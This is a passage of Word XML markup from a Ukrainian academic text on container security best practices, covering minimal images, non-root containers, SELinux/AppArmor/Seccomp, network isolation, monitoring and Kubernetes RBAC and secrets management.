          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>я мінімальних базових образів.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Щоб зменшити поверхню атаки, бажано використовувати </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>мінімальні образи, наприклад, Alpine Linux</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, які мають менше потенційних вразливостей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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2. </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>О</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>бмеження привілеїв контейнерів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="006A7651">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CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Запуск контейнерів з обм</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>еженими правами.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Не варто </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>запускати контейнери з правами “</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, оскільки це збільшує ймовірність компрометації </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>системи.</w:t>
      </w:r>
      <w:r w:rsidR="003400C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Краще використовувати обмежені</w:t>
      </w:r>
      <w:r w:rsidR="003400C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>користувацькі права</w:t>
      </w:r>
      <w:r w:rsidR="003400C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="006A7651">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>контейнерів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Використання </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>SELinux, AppArmor або Seccomp.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ці механізми безпеки дозволяють обмежити можливості контейнерів, наприклад, визначити, які системні виклики дозволено робити контейнеру, або які файли він може використовувати.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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3. Ізоляція контейнерів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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Ізоляція мережі.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Кожен контейнер повинен мати свою мережеву ізоляцію для зменшення можливості атаки. В</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>икористання Network Policies</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> у Kubernetes дозволяє налаштовувати правила доступу між контейнерами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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Обмеження доступу до ресурсів.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Контейнери повинні мати обмежений доступ до файлів та пристроїв хоста. Необхідно ретельно налаштовувати права доступу до ресурсів і файлів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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4. Моніторинг і аудит.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Логування і моніторинг</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Важливо налаштувати моніторинг контейнерів і збору логів, щоб вчасно виявляти підозрілу активність або несанкціоновані спроби доступу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Інтег</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>рація з системами моніторингу.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Використовуйте інс</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>трументи моніторингу, такі як Prometheus, Grafana, або Sysdig</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, для спостереження за станом контейнерів та хост-системи в реальному часі.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="005F0B54" w:rsidP="00CB205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5. </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Безпека оркестра</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>торів контейнерів (Kubernetes).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Налаштуван</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ня політик безпеки Kubernetes. Використання PodSecurityPolicies, RBAC</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Role</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>-Based Access Control), NetworkPolicies</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> для обмеження доступу до контейнерів у кластері.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="008C7EDF" w:rsidP="00CB205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CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Автоматичне онов</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>лення та управління конфіденційними активами.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Важливо регулярно оновлювати компоненти</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kubernetes і використовувати Secrets Management</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> для захисту конфіденційних даних.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00BC794C" w:rsidRDefault="002865BF" w:rsidP="00CB205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2865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>У п</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ідсумк</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>у необхідно зазначити, що к</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">онтейнери є потужним інструментом для розгортання додатків і забезпечення високої продуктивності, масштабованості та портативності, але їх безпека потребує </w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>особливої уваги. Завдяки своїй легковажній архітектурі та спільному використанню ядра хост-системи, контейнери можуть бути вразливими до ряду атак. Для забезпечення належного рівня безпеки важливо застосовувати найкращі практики, такі як обмеження привілеїв, сканування образів на наявність вразливостей, моніторинг і аудит, а також правильне налаштування ізоляції контейнерів. Тільки за умови ретельного управління безпекою можна максимально скористатися перевагами контейнерної технології без ризику для стабільності та цілісності системи</w:t>
      </w:r>
      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [10]</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F14887" w:rsidRDefault="00F14887">
      <w:pP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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0B54" w:rsidRDefault="005F0B54" w:rsidP="005F0B54">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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0B54" w:rsidRPr="002865BF" w:rsidRDefault="005F0B54" w:rsidP="005F0B54">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:caps/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
